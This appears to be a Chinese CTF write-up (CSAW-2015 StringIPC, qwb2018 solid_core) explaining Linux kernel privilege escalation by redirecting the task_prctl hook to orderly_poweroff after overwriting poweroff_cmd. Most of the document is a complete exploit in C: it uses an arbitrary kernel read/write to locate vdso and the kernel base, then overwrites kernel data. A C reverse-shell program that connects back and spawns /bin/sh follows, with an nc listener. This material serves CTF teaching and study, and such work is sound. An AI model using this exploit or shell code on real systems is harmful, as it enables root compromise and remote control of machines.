Hijack prctl
Prctl是linux的一個函數,可以對進程、線程做一些設置,prctl內部通過虛表來調用對應的功能,如果我們劫持prctl的虛表,使它指向其他對我們有幫助的內核函數,比如call_usermodehelper函數,該函數執行一個用戶傳入的二進制文件,且以root權限執行,由此可以利用起來提權。
我們分析一下prctl源碼,在linux/kernel/sys.c裏,我們看到這
我們繼續跟進,查看security_task_prctl函數,在linux/security/security.c文件裏找到
函數調用了task_prctl表裏的函數,因此,如果我們劫持task_prctl表,就能通過執行prctl來執行我們想要的函數,比如call_usermodehelper函數。爲了確定我們該劫持的表的地址,我們先寫一個小demo.c
- #include <sys/prctl.h>
- int main() {
- prctl(0,0);
- }
然後,編譯,放到系統裏,我們先查看一下security_task_prctl函數的地址
接下來,我們用gdb在這裏斷點,然後運行我們的demo程序
成功斷點
繼續單步運行,到這裏
從而,我們確定了task_prctl表的地址,減去內核基地址,我們就能確定task_prctl的偏移了。在這裏,我們得到的是偏移是0xeb8118。
有一點不幸的是, 傳入security_task_prctl函數的第一個參數被截斷了,這意味着,如果我們把task_prctl劫持爲call_usermodehelper,在64位下不能完成利用。
因爲call_usermodehelper函數的第一個參數是一個字符串地址
爲了解決這個問題,我們可以借鑑一下glibc下劫持爲one_gadget的思想,我們來搜索一下有沒有類似的one_gadget可以使用。我們在內核源碼裏搜索哪些函數調用了call_usermodehelper函數。
我們發現mce_do_trigger函數可以用,它調用call_usermodehelper函數的前兩個參數來自全局數據段,或許可以被我們劫持修改
我們有找到幾個合適的
其中run_cmd調用了call_usermodehelper函數。由此,我們只需要把prctl_task劫持到這幾個函數,比如__orderly_poweroff,然後篡改poweroff_cmd爲我們需要執行的二進制文件路徑。接着調用prctl,就會以root權限執行我們的二進制文件,從而提權。我們可以執行一個反彈shell的程序,然後用nc來連接。
爲了實現上述目標,我們首先需要得到內核基址,之前,我在https://blog.csdn.net/seaaseesa/article/details/104694219這篇博客裏講到了劫持vdso,我們同樣需要利用一下,我們計算出了vdso的地址後,就能算出內核的基址,因爲它們之間的差值是不變的。
我們以CSAW-2015-StringIPC爲例,它的exploit.c如下
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/time.h>
#include <sys/auxv.h>
#define CSAW_IOCTL_BASE 0x77617363
#define CSAW_ALLOC_CHANNEL CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL CSAW_IOCTL_BASE+5
#define CSAW_WRITE_CHANNEL CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL CSAW_IOCTL_BASE+8
//poweroff字符串的偏移
#define POWEROFF_CMD 0xE4DFA0
//orderly_poweroff函數的偏移
#define ORDERLY_POWEROFF 0x9c950
//task_prctl的偏移
#define TASK_PRCTL 0xeb8118;
struct alloc_channel_args {
size_t buf_size;
int id;
};
struct shrink_channel_args {
int id;
size_t size;
};
struct read_channel_args {
int id;
char *buf;
size_t count;
};
struct write_channel_args {
int id;
char *buf;
size_t count;
};
struct seek_channel_args {
int id;
loff_t index;
int whence;
};
void errExit(char *msg) {
puts(msg);
exit(-1);
}
//驅動的文件描述符
int fd;
//初始化驅動
void initFD() {
fd = open("/dev/csaw",O_RDWR);
if (fd < 0) {
errExit("[-] open file error!!");
}
}
//申請一個channel,返回id
int alloc_channel(size_t size) {
struct alloc_channel_args args;
args.buf_size = size;
args.id = -1;
ioctl(fd,CSAW_ALLOC_CHANNEL,&args);
if (args.id == -1) {
errExit("[-]alloc_channel error!!");
}
return args.id;
}
//改變channel的大小
void shrink_channel(int id,size_t size) {
struct shrink_channel_args args;
args.id = id;
args.size = size;
ioctl(fd,CSAW_SHRINK_CHANNEL,&args);
}
//seek
void seek_channel(int id,loff_t offset,int whence) {
struct seek_channel_args args;
args.id = id;
args.index = offset;
args.whence = whence;
ioctl(fd,CSAW_SEEK_CHANNEL,&args);
}
//讀取數據
void read_channel(int id,char *buf,size_t count) {
struct read_channel_args args;
args.id = id;
args.buf = buf;
args.count = count;
ioctl(fd,CSAW_READ_CHANNEL,&args);
}
//寫數據
void write_channel(int id,char *buf,size_t count) {
struct write_channel_args args;
args.id = id;
args.buf = buf;
args.count = count;
ioctl(fd,CSAW_WRITE_CHANNEL,&args);
}
//任意地址讀
void arbitrary_read(int id,char *buf,size_t addr,size_t count) {
seek_channel(id,addr-0x10,SEEK_SET);
read_channel(id,buf,count);
}
//任意地址寫
//由於題目中使用了strncpy_from_user,遇到0就會截斷,因此,我們逐字節寫入
void arbitrary_write(int id,char *buf,size_t addr,size_t count) {
for (int i=0;i<count;i++) {
seek_channel(id,addr+i-0x10,SEEK_SET);
write_channel(id,buf+i,1);
}
}
//獲取vdso裏的字符串"gettimeofday"相對vdso.so的偏移
int get_gettimeofday_str_offset() {
//獲取當前程序的vdso.so加載地址0x7ffxxxxxxxx
size_t vdso_addr = getauxval(AT_SYSINFO_EHDR);
char* name = "gettimeofday";
if (!vdso_addr) {
errExit("[-]error get name's offset");
}
//僅需要搜索1頁大小即可,因爲vdso映射就一頁0x1000
size_t name_addr = memmem(vdso_addr, 0x1000, name, strlen(name));
if (name_addr < 0) {
errExit("[-]error get name's offset");
}
return name_addr - vdso_addr;
}
int main() {
char *buf = (char *)calloc(1,0x1000);
initFD();
//申請一個channel,大小0x100
int id = alloc_channel(0x100);
//改變channel大小,形成漏洞,實現任意地址讀寫
shrink_channel(id,0x101);
//獲取gettimeofday字符串在vdso.so裏的偏移
int gettimeofday_str_offset = get_gettimeofday_str_offset();
printf("gettimeofday str in vdso.so offset=0x%x\n",gettimeofday_str_offset);
size_t vdso_addr = -1;
for (size_t addr=0xffffffff80000000;addr < 0xffffffffffffefff;addr += 0x1000) {
//讀取一頁數據
arbitrary_read(id,buf,addr,0x1000);
//如果在對應的偏移處,正好是這個字符串,那麼我們就能確定當前就是vdso的地址
//之所以能確定,是因爲我們每次讀取了0x1000字節數據,也就是1頁,而vdso的映射也只是1頁
if (!strcmp(buf+gettimeofday_str_offset,"gettimeofday")) {
printf("[+]find vdso.so!!\n");
vdso_addr = addr;
printf("[+]vdso in kernel addr=0x%lx\n",vdso_addr);
break;
}
}
if (vdso_addr == -1) {
errExit("[-]can't find vdso.so!!");
}
//計算出kernel基地址
size_t kernel_base = vdso_addr & 0xffffffffff000000;
printf("[+]kernel_base=0x%lx\n",kernel_base);
size_t poweroff_cmd_addr = kernel_base + POWEROFF_CMD;
printf("[+]poweroff_cmd_addr=0x%lx\n",poweroff_cmd_addr);
size_t orderly_poweroff_addr = kernel_base + ORDERLY_POWEROFF;
printf("[+]poweroff_cmd_addr=0x%lx\n",orderly_poweroff_addr);
size_t task_prctl_addr = kernel_base + TASK_PRCTL;
printf("[+]task_prctl_addr=0x%lx\n",task_prctl_addr);
//反彈shell,執行的二進制文件,由call_usermodehelper來執行,自帶root
char reverse_command[] = "/reverse_shell";
//修改poweroff_cmd_addr處的字符串爲我們需要執行的二進制文件的路徑
arbitrary_write(id,reverse_command,poweroff_cmd_addr,strlen(reverse_command));
//hijack prctl,使得task_prctl指向orderly_poweroff函數
arbitrary_write(id,&orderly_poweroff_addr,task_prctl_addr,8);
if (fork() == 0) { //fork一個子進程,來觸發shell的反彈
prctl(0,0);
exit(-1);
} else {
printf("[+]open a shell\n");
system("nc -lvnp 7777");
}
return 0;
}
而qwb2018-solid_core同樣,也是這個解法,稍作一下修改即可。反彈shell的程序如下
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include <fcntl.h>
#include <unistd.h>
char server_ip[]="127.0.0.1";
uint32_t server_port=7777;
int main()
{
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in attacker_addr = {0};
attacker_addr.sin_family = AF_INET;
attacker_addr.sin_port = htons(server_port);
attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
while(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
system("/bin/sh");
}